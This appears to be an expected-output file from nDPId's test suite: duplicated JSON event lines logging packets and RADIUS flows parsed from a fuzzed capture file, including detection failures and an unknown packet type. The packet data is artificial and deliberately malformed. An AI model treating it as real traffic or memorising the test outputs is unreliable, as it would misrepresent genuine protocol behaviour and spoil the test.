wMDAwY2U1MmE5MjI1YiwgNWIycmE5NTIvZjA6Nzk6NjA6ZDE6N2Q6MzcvMjM3BAasFAEQIA5WWldDMlRlc3RMYWIaDAAAN2MBBgAAAAIGBgAAgAIMBgAABRQ9BgAAABNABgAAAA1BBgAAAAZRBDU2TzoCAQA4ATAzMTE0ODAwNzM2MzgwNzJAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b3JrLm8lABoUAABXyAcOVlpXQzJUZXN0TGFiGgoAAFfICARFVBoQAABXyAoKU3RhbmRhcmQaEAAAV8gLClRlc3QgTGFiGgkAAFfIDwMxGgoAAFfIEAROShoRAABXyBELTHluZGh1cnN0GgwAAFfIEgYAAADJGhcAAFfIHRFWWlcgQzIgXGVZdCBMYWIaCwAAV8glBVZ6VxoNAAA4IQ6qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqg=="} 01282{"packet_event_id":1,"packet_event_name":"packet","packet_id":322,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":745,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":745,"pkt_l4_len":0,"thread_ts_msec":1528998338669,"pkt":"AAAMB6xAABRP+4rqCABFAMrbIVxAAP8RAAAKDEAexuIZNXIQBxQCxwAAAawCvx+brty2uhj+WwEK9jJ7XPQaCgAAV8gOBFVTGgwAAFfIDQZ3aWZpGg8AAFfICSUASVNQUjEwGgkAADghDQM0NwZbIqnGATUwMzExNDgwMDczNjM4WTcyQHdsYW4ubW5jNDgwLm1jYzMxMS4zZ3BwbmV0d29yay5vciUAAxB+CDFjaXNjb4MGAAAAAR8TZjAtNzktNjAtZDEtN2QtMzceJTAwLWE3LTQyLWQwLWUwLTAwOlZlQml6b25XaUZpQWNjZXNzBQYAAAAIGjEAAAAJASthdWRpdC1zZXNzaW9uLWlkPTEwZmYxMGFjMDAwMDAwY2U1MmE5MjI1YiwgNWIycmE5NTIvZjA6Nzk6NjA6ZDE6N2Q6MzcvMjM3BAasFAEQIA5WWldDMlRlc3RMYWIaDAAAN2MBBgAAAAIGBgAAgAIMBgAABRQ9BgAAABNABgAAAA1BBgAAAAZRBDU2TzoCAQA4ATAzMTE0ODAwNzM2MzgwNzJAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b3JrLm8lABoUAABXyAcOVlpXQzJUZXN0TGFiGgoAAFfICARFVBoQAABXyAoKU3RhbmRhcmQaEAAAV8gLClRlc3QgTGFiGgkAAFfIDwMxGgoAAFfIEAROShoRAABXyBELTHluZGh1cnN0GgwAAFfIEgYAAADJGhcAAFfIHRFWWlcgQzIgXGVZdCBMYWIaCwAAV8glBVZ6VxoNAAA4IQ6qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqg=="}
00232{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":322,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","l4_data_len":711,"global_ts_msec":1528998342492} 00218{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":322,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","l4_data_len":711,"global_ts_msec":1528998342492}
01268{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":324,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":725,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":725,"pkt_l4_len":0,"thread_ts_msec":1528998342683,"pkt":"AAAMB6xAABRP+4rqCABFACUAIV1AAP8RAAAKDEAexuIZNXIQBxQCswAAAa0Cqyd5am7x7at665a6XdQ818IaCgAAV8gOBFVTGgwAAFfIDQZ3aWZpGg8AAFfICQlXSVNQUjEwGgkAADhEDQM0NwZbIqnGATUwMzExNDgwMDczNjM4MDcyQHdsYW4ubW5jNDgwLm1jYzMxMS4zZ3BwbmV0d29yay5vcmdZAxB+CDFjaXNjb4MGAAAAAR8TZiAtNzktNjAtZDEtN2QtMzceJTAwLWE3LTQyLWQwLWUwLTAwOlZlcml6b25XaUZpQWNjZXNzBQYAAAAIGjEAAAAJASthdWRpdC1zZXNzaW9uLWlkSzEwZmYxMGFjMDAwMDAwY2U1MmE5MjI1YiwgNWIyMmE5NTIvZjA6Nzk6NjA6ZDE6N2Q6MzcvMjM3BAasFGYQIA5WSldDMlRlc3RMYWIaDAAAN2MBBgAAAAIGBgAAAAIMBgAABRQ9BgAAABNABgAAAA1BBgAAAAZRBDU2TyYCAgAkFwEAIAsFAACkCLiSdrciiCUA2Lhjf5WeAwIAIFh8yjsaFAAAV8gHDlZaV0My1GVzdExhYhoKAABXyAgERSUAEEYAV8gKClN0YW5kYXJkGhAAAFfICwpUZXN0IExhYhoJAABXyA8DMRoKAABXyBAETkoaEQAAV8gRC0x5bmRodXJzdBoMAABXyBIGAAAAyRoXAABXyB0RVlpXIEMyIFSqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="} 01254{"packet_event_id":1,"packet_event_name":"packet","packet_id":324,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":725,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":725,"pkt_l4_len":0,"thread_ts_msec":1528998342683,"pkt":"AAAMB6xAABRP+4rqCABFACUAIV1AAP8RAAAKDEAexuIZNXIQBxQCswAAAa0Cqyd5am7x7at665a6XdQ818IaCgAAV8gOBFVTGgwAAFfIDQZ3aWZpGg8AAFfICQlXSVNQUjEwGgkAADhEDQM0NwZbIqnGATUwMzExNDgwMDczNjM4MDcyQHdsYW4ubW5jNDgwLm1jYzMxMS4zZ3BwbmV0d29yay5vcmdZAxB+CDFjaXNjb4MGAAAAAR8TZiAtNzktNjAtZDEtN2QtMzceJTAwLWE3LTQyLWQwLWUwLTAwOlZlcml6b25XaUZpQWNjZXNzBQYAAAAIGjEAAAAJASthdWRpdC1zZXNzaW9uLWlkSzEwZmYxMGFjMDAwMDAwY2U1MmE5MjI1YiwgNWIyMmE5NTIvZjA6Nzk6NjA6ZDE6N2Q6MzcvMjM3BAasFGYQIA5WSldDMlRlc3RMYWIaDAAAN2MBBgAAAAIGBgAAAAIMBgAABRQ9BgAAABNABgAAAA1BBgAAAAZRBDU2TyYCAgAkFwEAIAsFAACkCLiSdrciiCUA2Lhjf5WeAwIAIFh8yjsaFAAAV8gHDlZaV0My1GVzdExhYhoKAABXyAgERSUAEEYAV8gKClN0YW5kYXJkGhAAAFfICwpUZXN0IExhYhoJAABXyA8DMRoKAABXyBAETkoaEQAAV8gRC0x5bmRodXJzdBoMAABXyBIGAAAAyRoXAABXyB0RVlpXIEMyIFSqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="}
00232{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":324,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","l4_data_len":691,"global_ts_msec":1528998342974} 00218{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":324,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","l4_data_len":691,"global_ts_msec":1528998342974}
00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":327,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998346991,"flow_last_seen":1528998346991,"flow_idle_time":180000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528998346991,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29208,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":327,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998346991,"flow_last_seen":1528998346991,"flow_idle_time":180000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528998346991,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29208,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00716{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":327,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":70,"flow_packet_id":1,"flow_last_seen":1528998346991,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":239,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":239,"pkt_l4_len":205,"thread_ts_msec":1528998346991,"pkt":"ABRP+4rqcNuTVcUnCABFAADhDRdAAPwRRrPG4hk1CgxAHgcUchgAzQnPC64AxTy6++0fAX35UVXUpCEgeNcBNTAzMTE0ODAwNzM2MzgwNzJAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b3JrLm9yZywgNWIyMmE5NTIvZjAlADk6QTA6ZCUAN2Q6MzcvMjM3T0oBAgBIFwEAAAEFAAB+LhDHIi3oCVbmy0rSchdaAgUAAJdIOUyErgAA73piWKcgvT+LAQACCwUAAEZfsVUxfYxGJMfW\/6iCQHdQEgwvQS2NfxbBCfFadP4Rx2E="} 00716{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":327,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":70,"flow_packet_id":1,"flow_last_seen":1528998346991,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":239,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":239,"pkt_l4_len":205,"thread_ts_msec":1528998346991,"pkt":"ABRP+4rqcNuTVcUnCABFAADhDRdAAPwRRrPG4hk1CgxAHgcUchgAzQnPC64AxTy6++0fAX35UVXUpCEgeNcBNTAzMTE0ODAwNzM2MzgwNzJAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b3JrLm9yZywgNWIyMmE5NTIvZjAlADk6QTA6ZCUAN2Q6MzcvMjM3T0oBAgBIFwEAAAEFAAB+LhDHIi3oCVbmy0rSchdaAgUAAJdIOUyErgAA73piWKcgvT+LAQACCwUAAEZfsVUxfYxGJMfW\/6iCQHdQEgwvQS2NfxbBCfFadP4Rx2E="}
00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":327,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998346991,"flow_last_seen":1528998346991,"flow_idle_time":180000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528998346991,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29208,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":327,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998346991,"flow_last_seen":1528998346991,"flow_idle_time":180000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528998346991,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29208,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":328,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998347284,"flow_last_seen":1528998347284,"flow_idle_time":180000,"flow_min_l4_payload_len":683,"flow_max_l4_payload_len":683,"flow_tot_l4_payload_len":683,"flow_avg_l4_payload_len":683,"midstream":0,"thread_ts_msec":1528998347284,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29289,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":328,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998347284,"flow_last_seen":1528998347284,"flow_idle_time":180000,"flow_min_l4_payload_len":683,"flow_max_l4_payload_len":683,"flow_tot_l4_payload_len":683,"flow_avg_l4_payload_len":683,"midstream":0,"thread_ts_msec":1528998347284,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29289,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
01363{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":328,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":71,"flow_packet_id":1,"flow_last_seen":1528998347284,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":725,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":725,"pkt_l4_len":691,"thread_ts_msec":1528998347284,"pkt":"AAAMB6xAABRP+4rqCABFAALHIV9AAP8RAAAKDEAexuIZNXJpBxQCswAAAa8Cq915o4ky+NTjcjv0F1wXmegaCgAAV8gOBFVTGgwAADHIDQZ3aWZpGg8AAFfICRlXSVNQUjEwGgkAADghDQM0NwZbIqnLATUwMzExNDgwMDczNjM4MDcyQHdsYW4ubW5jNDgwLm1jYzMxMS4zZ3BwbmV0d29yay5vcmdZAxB+CDEjaXNjb4MGAAAAAR8TZjAtNzktNjAtZDEtN2QtMzceJTAwLWE3LTQyLWQw72UwLTAwOlYlcml6b25XaUZpQWNjZXNzBQYAAAAIGjEAAAAJASthdWRpdC1zZXNzaW9uLWlkPTEwZmYxMGFjaTAwMDAwY2U1MmE5MjI1YiwgNWIyMmE5NSUAZjA6Nzk6NjA6ZDE6N2Q6MzcvMjM3UwasFAEQIA5WWldDMlRlc3SHYWIaDAAAN2MBBgAAAAIGBgAAAAIMBgAABRQ9BgAAABNABgAAAA1BBgAAAAZRBDU2TyYCAgAkFwEAAAsFAAA+8R0Z7LSWHOP9VffmhYCuAwIAIG5bieAaFAAAV8gHDlZaV0MyVGVzdExhahoKAABXyAgERVQaEAAA+8gKClN0YW5kYXJkGhAAAFfICwhUZXN0IExhYhoJAABXyA8DMRoKAABXyBAETkpiEQAAV8gRC055bmRodXJzdBoMACU4yKqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="} 01363{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":328,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":71,"flow_packet_id":1,"flow_last_seen":1528998347284,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":725,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":725,"pkt_l4_len":691,"thread_ts_msec":1528998347284,"pkt":"AAAMB6xAABRP+4rqCABFAALHIV9AAP8RAAAKDEAexuIZNXJpBxQCswAAAa8Cq915o4ky+NTjcjv0F1wXmegaCgAAV8gOBFVTGgwAADHIDQZ3aWZpGg8AAFfICRlXSVNQUjEwGgkAADghDQM0NwZbIqnLATUwMzExNDgwMDczNjM4MDcyQHdsYW4ubW5jNDgwLm1jYzMxMS4zZ3BwbmV0d29yay5vcmdZAxB+CDEjaXNjb4MGAAAAAR8TZjAtNzktNjAtZDEtN2QtMzceJTAwLWE3LTQyLWQw72UwLTAwOlYlcml6b25XaUZpQWNjZXNzBQYAAAAIGjEAAAAJASthdWRpdC1zZXNzaW9uLWlkPTEwZmYxMGFjaTAwMDAwY2U1MmE5MjI1YiwgNWIyMmE5NSUAZjA6Nzk6NjA6ZDE6N2Q6MzcvMjM3UwasFAEQIA5WWldDMlRlc3SHYWIaDAAAN2MBBgAAAAIGBgAAAAIMBgAABRQ9BgAAABNABgAAAA1BBgAAAAZRBDU2TyYCAgAkFwEAAAsFAAA+8R0Z7LSWHOP9VffmhYCuAwIAIG5bieAaFAAAV8gHDlZaV0MyVGVzdExhahoKAABXyAgERVQaEAAA+8gKClN0YW5kYXJkGhAAAFfICwhUZXN0IExhYhoJAABXyA8DMRoKAABXyBAETkpiEQAAV8gRC055bmRodXJzdBoMACU4yKqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="}
00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":328,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998347284,"flow_last_seen":1528998347284,"flow_idle_time":180000,"flow_min_l4_payload_len":683,"flow_max_l4_payload_len":683,"flow_tot_l4_payload_len":683,"flow_avg_l4_payload_len":683,"midstream":0,"thread_ts_msec":1528998347284,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29289,"dst_port":1812,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":328,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998347284,"flow_last_seen":1528998347284,"flow_idle_time":180000,"flow_min_l4_payload_len":683,"flow_max_l4_payload_len":683,"flow_tot_l4_payload_len":683,"flow_avg_l4_payload_len":683,"midstream":0,"thread_ts_msec":1528998347284,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29289,"dst_port":1812,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
00725{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":329,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":318,"pkt_type":43690,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":318,"pkt_l4_len":0,"thread_ts_msec":1528998347284,"pkt":"ABRP+4rqcNuYVcUnqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq"} 00711{"packet_event_id":1,"packet_event_name":"packet","packet_id":329,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":318,"pkt_type":43690,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":318,"pkt_l4_len":0,"thread_ts_msec":1528998347284,"pkt":"ABRP+4rqcNuYVcUnqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq"}
00214{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":329,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","layer_type":43690,"global_ts_msec":1528998347461} 00200{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":329,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","layer_type":43690,"global_ts_msec":1528998347461}
00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":330,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998372930,"flow_last_seen":1528998372930,"flow_idle_time":180000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"thread_ts_msec":1528998372930,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.21","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":330,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528998372930,"flow_last_seen":1528998372930,"flow_idle_time":180000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"thread_ts_msec":1528998372930,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.21","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
01392{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":330,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":72,"flow_packet_id":1,"flow_last_seen":1528998372930,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":745,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":745,"pkt_l4_len":711,"thread_ts_msec":1528998372930,"pkt":"AAAMB6xAABRP+4rqCABFAALbIWBAAP8RAAAKDEAexuIZFXIQBxQCxwAAAbACvzQe93K2s3Upjyh7NVxn+MAaCgAAV8gOBFVTGgwAAFfIDQZ3aWZpGg8AAFfICQlXSVNQUjEwGgkAADghDQM3NwZbIqnkATUwMzExNDgwMjMyNTY4NjMxkHdsYW4ubW5jNDgwLm1jYzMxMS4zZ3BwbmV0d29yay5vcmdZAxB+CDFjaXNjb4MGggAAAR8TOTAtYjAtZWQtNGUtNzctYTMeJTAwLWE3LTQyLWQwLWUwLTAwOlZlcml6b25XaUZpQWNjZXNzBQYAAAAIGjEAAAAJASthdWRpdC1zZXNzaW9uLWlkPTEwZmYxMGFjMDDyMDAw\/jJtNGE5MjI1YiwgNWIyMmE5ZTQvOTA6YjA6ZWQ6NGU6Nzc6YTMvMjQxBAasFAEQIA5WWldDMlRlc3RMYWIaDAAAN2MBBgAAAAIGBgAQAAIMBgAABRQ9BgAAABNABgAAAA1BBgAAAAZRBDU2TzcCAQA4ATAzMTE0ODAyMzI1Njg2MzFAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b3JrLm9yZxoUAABXyAclAFpXQzJUZXN0TGEiGgoAAFfICARFVBoQAABXyAoKU3RhbmRhcmQaEAAAV8gLClRlc3QgTGFiGlAAAFfIDwMxGgoAAFfIEAROShoRAABXyBELTHluZGh1cnN0GgwAAFfIEgYAAADJGhcAAFfIHRFWWld0QzIgVGVzdCBMYWIaCwAAV8klBVZ6VxoNAAA4IQ4HMDcwNzEaDAAAOG4RBgAAAAAaFQAAOCESD0ludmFsaWQgVmFsdWUaHQAAOCETFzQwLjgwNDg4Mk4tNzQuMTAyODM5VxoMAAA4IRQGAAABAhoMAAA4IRUGAAAAAhoVAAA4IRYPU3RhZGl1bbJpcmVjdBoMAAAFgwcGwFBKmVASj8JRxOD8ARCA2Tk5GozLCQ=="} 01392{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":330,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":72,"flow_packet_id":1,"flow_last_seen":1528998372930,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":745,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":745,"pkt_l4_len":711,"thread_ts_msec":1528998372930,"pkt":"AAAMB6xAABRP+4rqCABFAALbIWBAAP8RAAAKDEAexuIZFXIQBxQCxwAAAbACvzQe93K2s3Upjyh7NVxn+MAaCgAAV8gOBFVTGgwAAFfIDQZ3aWZpGg8AAFfICQlXSVNQUjEwGgkAADghDQM3NwZbIqnkATUwMzExNDgwMjMyNTY4NjMxkHdsYW4ubW5jNDgwLm1jYzMxMS4zZ3BwbmV0d29yay5vcmdZAxB+CDFjaXNjb4MGggAAAR8TOTAtYjAtZWQtNGUtNzctYTMeJTAwLWE3LTQyLWQwLWUwLTAwOlZlcml6b25XaUZpQWNjZXNzBQYAAAAIGjEAAAAJASthdWRpdC1zZXNzaW9uLWlkPTEwZmYxMGFjMDDyMDAw\/jJtNGE5MjI1YiwgNWIyMmE5ZTQvOTA6YjA6ZWQ6NGU6Nzc6YTMvMjQxBAasFAEQIA5WWldDMlRlc3RMYWIaDAAAN2MBBgAAAAIGBgAQAAIMBgAABRQ9BgAAABNABgAAAA1BBgAAAAZRBDU2TzcCAQA4ATAzMTE0ODAyMzI1Njg2MzFAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b3JrLm9yZxoUAABXyAclAFpXQzJUZXN0TGEiGgoAAFfICARFVBoQAABXyAoKU3RhbmRhcmQaEAAAV8gLClRlc3QgTGFiGlAAAFfIDwMxGgoAAFfIEAROShoRAABXyBELTHluZGh1cnN0GgwAAFfIEgYAAADJGhcAAFfIHRFWWld0QzIgVGVzdCBMYWIaCwAAV8klBVZ6VxoNAAA4IQ4HMDcwNzEaDAAAOG4RBgAAAAAaFQAAOCESD0ludmFsaWQgVmFsdWUaHQAAOCETFzQwLjgwNDg4Mk4tNzQuMTAyODM5VxoMAAA4IRQGAAABAhoMAAA4IRUGAAAAAhoVAAA4IRYPU3RhZGl1bbJpcmVjdBoMAAAFgwcGwFBKmVASj8JRxOD8ARCA2Tk5GozLCQ=="}
